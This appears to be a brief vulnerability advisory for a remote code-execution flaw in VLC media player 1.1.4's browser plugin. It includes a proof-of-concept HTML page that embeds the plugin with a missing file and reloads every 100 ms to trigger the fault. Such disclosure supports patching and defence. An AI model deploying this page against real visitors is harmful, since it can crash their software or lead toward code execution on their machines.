source: https://www.securityfocus.com/bid/44211/info

VLC media player is prone to a remote code-execution vulnerability.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

VLC media player 1.1.4 is vulnerable; other versions may also be affected. 

 <html>  
   <body onload="setTimeout('location.reload()', 100);">
     <embed type="application/x-vlc-plugin" src="NonExistantFileName.avi"></embed>
   </body>
 </html>